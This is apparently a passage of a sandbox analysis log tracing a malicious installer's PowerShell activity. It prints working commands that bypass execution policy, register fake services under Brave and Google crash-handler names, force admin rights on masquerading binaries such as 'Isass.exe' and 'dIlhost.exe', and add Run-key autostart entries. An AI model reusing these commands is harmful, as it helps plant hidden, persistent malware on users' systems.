ABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIAB0AGgAZQAgAGIAYQBjAGsAdQBwACAAbQBhAHkAIABmAGEAaQBsAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAGQAaQBzAGEAYgBsAGUAZAAsACAAYQBuAHkAIABzAGUAcgB2AGkAYwBlAHMAIAB0AGgAYQB0ACAAZQB4AHAAbABpAGMAaQB0AGwAeQAgAGQAZQBwAGUAbgBkACAAbwBuACAAaQB0ACAAdwBpAGwAbAAgAGYAYQBpAGwAIAB0AG8AIABzAHQAYQByAHQALgAiACAALQBTAHQAYQByAHQAdQBwAFQAeQBwAGUAIAAiAEEAdQB0AG8AbQBhAHQAaQBjACIAIAAtAEIAaQBuAGEAcgB5AFAAYQB0AGgATgBhAG0AZQAgACIAJABlAG4AdgA6AFAAUgBPAEcAUgBBAE0ARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIACgAKAE4AZQB3AC0AUwBlAHIAdgBpAGMAZQAgAC0ATgBhAG0AZQAgACIARABlAHYAQQBzAHMAbwBjAE0AYQBuACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIARABlAHYAaQBjAGUAIABBAHMAcwBvAGMAaQBhAHQAaQBvAG4AIABNAGEAbgBhAGcAZQByACIAIAAtAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAgACIATQBhAG4AYQBnAGUAcwAgAGEAbgBkACAAaQBtAHAAbABlAG0AZQBuAHQAcwAgAEQAZQB2AGkAYwBlACAAQQBzAHMAbwBjAGkAYQB0AGkAbwBuACAATQBhAG4AYQBnAGUAcgAgAHUAcwBlAGQAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIABvAHQAaABlAHIAIABwAHUAcgBwAG8AcwBlAHMALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAcwB0AG8AcABwAGUAZAAsACAAcwBoAGEAZABvAHcAIABjAG8AcABpAGUAcwAgAHcAaQBsAGwAIABiAGUAIAB1AG4AYQB2AGEAaQBsAGEAYgBsAGUAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIAB0AGgAZQAgAGIAYQBjAGsAdQBwACAAbQBhAHkAIABmAGEAaQBsAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAGQAaQBzAGEAYgBsAGUAZAAsACAAYQBuAHkAIABzAGUAcgB2AGkAYwBlAHMAIAB0AGgAYQB0ACAAZQB4AHAAbABpAGMAaQB0AGwAeQAgAGQAZQBwAGUAbgBkACAAbwBuACAAaQB0ACAAdwBpAGwAbAAgAGYAYQBpAGwAIAB0AG8AIABzAHQAYQByAHQALgAiACAALQBTAHQAYQByAHQAdQBwAFQAeQBwAGUAIAAiAEEAdQB0AG8AbQBhAHQAaQBjACIAIAAtAEIAaQBuAGEAcgB5AFAAYQB0AGgATgBhAG0AZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIACgAKAE4AZQB3AC0AUwBlAHIAdgBpAGMAZQAgAC0ATgBhAG0AZQAgACIATgBnAGMAQwBwAG0AcgBTAHYAYwAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAE0AaQBjAHIAbwBzAG8AZgB0ACAAQwByAGUAZABlAG4AdABpAGEAbABzACAAUABhAHMAcwBwAG8AcgB0ACIAIAAtAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAgACIATQBhAG4AYQBnAGUAcwAgAGEAbgBkACAAaQBtAHAAbABlAG0AZQBuAHQAcwAgAE0AaQBjAHIAbwBzAG8AZgB0ACAAQwByAGUAZABlAG4AdABpAGEAbABzACAAUABhAHMAcwBwAG8AcgB0ACAAdQBzAGUAZAAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAG8AdABoAGUAcgAgAHAAdQByAHAAbwBzAGUAcwAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABzAHQAbwBwAHAAZQBkACwAIABzAGgAYQBkAG8AdwAgAGMAbwBwAGkAZQBzACAAdwBpAGwAbAAgAGIAZQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAHQAaABlACAAYgBhAGMAawB1AHAAIABtAGEAeQAgAGYAYQBpAGwALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAZABpAHMAYQBiAGwAZQBkACwAIABhAG4AeQAgAHMAZQByAHYAaQBjAGUAcwAgAHQAaABhAHQAIABlAHgAcABsAGkAYwBpAHQAbAB5ACAAZABlAHAAZQBuAGQAIABvAG4AIABpAHQAIAB3AGkAbABsACAAZgBhAGkAbAAgAHQAbwAgAHMAdABhAHIAdAAuACIAIAAtAFMAdABhAHIAdAB1AHAAVAB5AHAAZQAgACIAQQB1AHQAbwBtAGEAdABpAGMAIgAgAC0AQgBpAG4AYQByAHkAUABhAHQAaABOAGEAbQBlACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIACgAKAE4AZQB3AC0AUwBlAHIAdgBpAGMAZQAgAC0ATgBhAG0AZQAgACIAVABpAG0AZQBSAGEAdABpAG8AUwB2AGMAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBUAGkAbQBlACAAUgBhAHQAaQBvACAAUwBlAHIAdgBpAGMAZQAiACAALQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AIAAiAE0AYQBuAGEAZwBlAHMAIABhAG4AZAAgAGkAbQBwAGwAZQBtAGUAbgB0AHMAIABUAGkAbQBlACAAUgBhAHQAaQBvACAAUwBlAHIAdgBpAGMAZQAgAHUAcwBlAGQAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIABvAHQAaABlAHIAIABwAHUAcgBwAG8AcwBlAHMALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAcwB0AG8AcABwAGUAZAAsACAAcwBoAGEAZABvAHcAIABjAG8AcABpAGUAcwAgAHcAaQBsAGwAIABiAGUAIAB1AG4AYQB2AGEAaQBsAGEAYgBsAGUAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIAB0AGgAZQAgAGIAYQBjAGsAdQBwACAAbQBhAHkAIABmAGEAaQBsAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAGQAaQBzAGEAYgBsAGUAZAAsACAAYQBuAHkAIABzAGUAcgB2AGkAYwBlAHMAIAB0AGgAYQB0ACAAZQB4AHAAbABpAGMAaQB0AGwAeQAgAGQAZQBwAGUAbgBkACAAbwBuACAAaQB0ACAAdwBpAGwAbAAgAGYAYQBpAGwAIAB0AG8AIABzAHQAYQByAHQALgAiACAALQBTAHQAYQByAHQAdQBwAFQAeQBwAGUAIAAiAEEAdQB0AG8AbQBhAHQAaQBjACIAIAAtAEIAaQBuAGEAcgB5AFAAYQB0AGgATgBhAG0AZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIgAKAAoATgBlAHcALQBTAGUAcgB2AGkAYwBlACAALQBOAGEAbQBlACAAIgBTAHAAbwBvAGwAZQByAEMAbwBuAHQAcgBvAGwAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBTAHAAbwBvAGwAZQByACAAQQBkAHYAYQBuAGMAZQAgAEMAbwBuAHQAcgBvAGwAIgAgAC0ARABlAHMAYwByAGkAcAB0AGkAbwBuACAAIgBNAGEAbgBhAGcAZQBzACAAYQBuAGQAIABpAG0AcABsAGUAbQBlAG4AdABzACAAUwBwAG8AbwBsAGUAcgAgAFAAcgBvAGcAcgBhAG0AIABDAG8AbgB0AHIAbwBsACAAdQBzAGUAZAAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAG8AdABoAGUAcgAgAHAAdQByAHAAbwBzAGUAcwAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABzAHQAbwBwAHAAZQBkACwAIABzAGgAYQBkAG8AdwAgAGMAbwBwAGkAZQBzACAAdwBpAGwAbAAgAGIAZQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAHQAaABlACAAYgBhAGMAawB1AHAAIABtAGEAeQAgAGYAYQBpAGwALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAZABpAHMAYQBiAGwAZQBkACwAIABhAG4AeQAgAHMAZQByAHYAaQBjAGUAcwAgAHQAaABhAHQAIABlAHgAcABsAGkAYwBpAHQAbAB5ACAAZABlAHAAZQBuAGQAIABvAG4AIABpAHQAIAB3AGkAbABsACAAZgBhAGkAbAAgAHQAbwAgAHMAdABhAHIAdAAuACIAIAAtAFMAdABhAHIAdAB1AHAAVAB5AHAAZQAgACIAQQB1AHQAbwBtAGEAdABpAGMAIgAgAC0AQgBpAG4AYQByAHkAUABhAHQAaABOAGEAbQBlACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAbQBhAGsAZQAuAGUAeABlACIACgAKAE4AZQB3AC0AUwBlAHIAdgBpAGMAZQAgAC0ATgBhAG0AZQAgACIAVABlAGwAZQBtAGUAdAByAHkATQBnAG0AdAAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFQAZQBsAGUAbQBlAHQAcgB5ACAATQBhAG4AYQBnAGUAcgAiACAALQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AIAAiAE0AYQBuAGEAZwBlAHMAIABhAG4AZAAgAGkAbQBwAGwAZQBtAGUAbgB0AHMAIABUAGUAbABlAG0AZQB0AHIAeQAgAE0AYQBuAGEAZwBlAHIAIABDAG8AbgB0AHIAbwBsACAAdQBzAGUAZAAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAG8AdABoAGUAcgAgAHAAdQByAHAAbwBzAGUAcwAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABzAHQAbwBwAHAAZQBkACwAIABzAGgAYQBkAG8AdwAgAGMAbwBwAGkAZQBzACAAdwBpAGwAbAAgAGIAZQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAHQAaABlACAAYgBhAGMAawB1AHAAIABtAGEAeQAgAGYAYQBpAGwALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAZABpAHMAYQBiAGwAZQBkACwAIABhAG4AeQAgAHMAZQByAHYAaQBjAGUAcwAgAHQAaABhAHQAIABlAHgAcABsAGkAYwBpAHQAbAB5ACAAZABlAHAAZQBuAGQAIABvAG4AIABpAHQAIAB3AGkAbABsACAAZgBhAGkAbAAgAHQAbwAgAHMAdABhAHIAdAAuACIAIAAtAFMAdABhAHIAdAB1AHAAVAB5AHAAZQAgACIAQQB1AHQAbwBtAGEAdABpAGMAIgAgAC0AQgBpAG4AYQByAHkAUABhAHQAaABOAGEAbQBlACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAZQBkAGkAdAAuAGUAeABlACIA
                                                                                                      4⤵
                                                                                                        PID:1360
                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                          "C:\Windows\system32\chcp.com" 1252
                                                                                                          5⤵
                                                                                                            PID:5856
                                                                                                      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss83F0.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi83DE.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr83DF.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr83E0.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                                                                        3⤵
                                                                                                          PID:5996
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc c h c p   1 2 5 2 
 $ P r o g r e s s P r e f e r e n c e   =   ' S i l e n t l y C o n t i n u e ' 
 
 S e t - E x e c u t i o n P o l i c y   - S c o p e   C u r r e n t U s e r   B y p a s s   - F o r c e 
 S e t - E x e c u t i o n P o l i c y   - S c o p e   L o c a l M a c h i n e   B y p a s s   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : P R O G R A M D A T A \ B r a v e C r a s h H a n d l e r . e x e "   - V a l u e   " ~   R U N A S A D M I N "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   - P a t h   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : P R O G R A M D A T A \ B r a v e C r a s h H a n d l e r . e x e "   - T y p e   S t r i n g   - V a l u e   " ~   R U N A S A D M I N "   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : A P P D A T A \ G o o g l e C r a s h H a n d l e r . e x e "   - V a l u e   " ~   R U N A S A D M I N "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   - P a t h   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : A P P D A T A \ G o o g l e C r a s h H a n d l e r . e x e "   - T y p e   S t r i n g   - V a l u e   " ~   R U N A S A D M I N "   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : U S E R P R O F I L E \ A P P D A T A \ L O C A L \ T E M P \ d I l h o s t . e x e "   - V a l u e   " ~   R U N A S A D M I N "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   - P a t h   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : U S E R P R O F I L E \ A P P D A T A \ L O C A L \ T E M P \ d I l h o s t . e x e "   - T y p e   S t r i n g   - V a l u e   " ~   R U N A S A D M I N "   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : S y s t e m R o o t \ T E M P \ d I l h o s t . e x e "   - V a l u e   " ~   R U N A S A D M I N "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   - P a t h   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : S y s t e m R o o t \ T E M P \ d I l h o s t . e x e "   - T y p e   S t r i n g   - V a l u e   " ~   R U N A S A D M I N "   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : A P P D A T A \ G o o g l e C r a s h H a n d l e r 6 4 . e x e "   - V a l u e   " ~   R U N A S A D M I N "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   - P a t h   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : A P P D A T A \ G o o g l e C r a s h H a n d l e r 6 4 . e x e "   - T y p e   S t r i n g   - V a l u e   " ~   R U N A S A D M I N "   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : U S E R P R O F I L E \ A P P D A T A \ L O C A L \ T E M P \ d l I h o s t . e x e "   - V a l u e   " ~   R U N A S A D M I N "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   - P a t h   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : U S E R P R O F I L E \ A P P D A T A \ L O C A L \ T E M P \ d l I h o s t . e x e "   - T y p e   S t r i n g   - V a l u e   " ~   R U N A S A D M I N "   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : S y s t e m R o o t \ T E M P \ d l I h o s t . e x e "   - V a l u e   " ~   R U N A S A D M I N "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   - P a t h   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : S y s t e m R o o t \ T E M P \ d l I h o s t . e x e "   - T y p e   S t r i n g   - V a l u e   " ~   R U N A S A D M I N "   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : A P P D A T A \ B r a v e C r a s h H a n d l e r 6 4 . e x e "   - V a l u e   " ~   R U N A S A D M I N "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   - P a t h   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : A P P D A T A \ B r a v e C r a s h H a n d l e r 6 4 . e x e "   - T y p e   S t r i n g   - V a l u e   " ~   R U N A S A D M I N "   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : U S E R P R O F I L E \ A P P D A T A \ L O C A L \ T E M P \ R u n t i m e B r o o k e r . e x e "   - V a l u e   " ~   R U N A S A D M I N "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   - P a t h   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : U S E R P R O F I L E \ A P P D A T A \ L O C A L \ T E M P \ R u n t i m e B r o o k e r . e x e "   - T y p e   S t r i n g   - V a l u e   " ~   R U N A S A D M I N "   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : A P P D A T A \ t r a f f m o n e t i z e r \ a p p \ T e x t l n p u t H o s t . e x e "   - V a l u e   " ~   R U N A S A D M I N "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   - P a t h   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : A P P D A T A \ t r a f f m o n e t i z e r \ a p p \ T e x t l n p u t H o s t . e x e "   - T y p e   S t r i n g   - V a l u e   " ~   R U N A S A D M I N "   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : U S E R P R O F I L E \ E m b m a k e . e x e "   - V a l u e   " ~   R U N A S A D M I N "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   - P a t h   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : U S E R P R O F I L E \ E m b m a k e . e x e "   - T y p e   S t r i n g   - V a l u e   " ~   R U N A S A D M I N "   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : U S E R P R O F I L E \ A P P D A T A \ L O C A L \ T E M P \ U s e r 0 0 B E B r o k e r . e x e "   - V a l u e   " ~   R U N A S A D M I N "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   - P a t h   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : U S E R P R O F I L E \ A P P D A T A \ L O C A L \ T E M P \ U s e r 0 0 B E B r o k e r . e x e "   - T y p e   S t r i n g   - V a l u e   " ~   R U N A S A D M I N "   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : S y s t e m R o o t \ T E M P \ U s e r 0 0 B E B r o k e r . e x e "   - V a l u e   " ~   R U N A S A D M I N "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   - P a t h   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : S y s t e m R o o t \ T E M P \ U s e r 0 0 B E B r o k e r . e x e "   - T y p e   S t r i n g   - V a l u e   " ~   R U N A S A D M I N "   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : U S E R P R O F I L E \ E m b e d i t . e x e "   - V a l u e   " ~   R U N A S A D M I N "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   - P a t h   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : U S E R P R O F I L E \ E m b e d i t . e x e "   - T y p e   S t r i n g   - V a l u e   " ~   R U N A S A D M I N "   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : U S E R P R O F I L E \ A P P D A T A \ L O C A L \ T E M P \ I s a s s . e x e "   - V a l u e   " ~   R U N A S A D M I N "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   - P a t h   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : U S E R P R O F I L E \ A P P D A T A \ L O C A L \ T E M P \ I s a s s . e x e "   - T y p e   S t r i n g   - V a l u e   " ~   R U N A S A D M I N "   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : S y s t e m R o o t \ T E M P \ I s a s s . e x e "   - V a l u e   " ~   R U N A S A D M I N "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   - P a t h   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   " $ e n v : S y s t e m R o o t \ T E M P \ I s a s s . e x e "   - T y p e   S t r i n g   - V a l u e   " ~   R U N A S A D M I N "   - F o r c e 
                                                                                                            4⤵
                                                                                                              PID:428
                                                                                                              • C:\Windows\system32\chcp.com
                                                                                                                "C:\Windows\system32\chcp.com" 1252
                                                                                                                5⤵
                                                                                                                  PID:5920
                                                                                                            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss8676.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi8673.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr8674.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr8675.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                                                                              3⤵
                                                                                                                PID:5688
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc c h c p   1 2 5 2 
 $ P r o g r e s s P r e f e r e n c e   =   ' S i l e n t l y C o n t i n u e ' 
 
 S e t - E x e c u t i o n P o l i c y   - S c o p e   C u r r e n t U s e r   B y p a s s   - F o r c e 
 S e t - E x e c u t i o n P o l i c y   - S c o p e   L o c a l M a c h i n e   B y p a s s   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n "   - N a m e   " B r a v e C r a s h H a n d l e r "   - V a l u e   " $ e n v : P R O G R A M D A T A \ B r a v e C r a s h H a n d l e r . e x e "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n "   - N a m e   " B r a v e C r a s h H a n d l e r "   - V a l u e   " $ e n v : P R O G R A M D A T A \ B r a v e C r a s h H a n d l e r . e x e "   - T y p e   S t r i n g   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n "   - N a m e   " B r a v e C r a s h H a n d l e r "   - V a l u e   " $ e n v : P R O G R A M D A T A \ B r a v e C r a s h H a n d l e r . e x e "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n "   - N a m e   " B r a v e C r a s h H a n d l e r "   - V a l u e   " $ e n v : P R O G R A M D A T A \ B r a v e C r a s h H a n d l e r . e x e "   - T y p e   S t r i n g   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n "   - N a m e   " G o o g l e C r a s h H a n d l e r "   - V a l u e   " $ e n v : A P P D A T A \ G o o g l e C r a s h H a n d l e r . e x e "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n "   - N a m e   " G o o g l e C r a s h H a n d l e r "   - V a l u e   " $ e n v : A P P D A T A \ G o o g l e C r a s h H a n d l e r . e x e "   - T y p e   S t r i n g   - F o r c e 
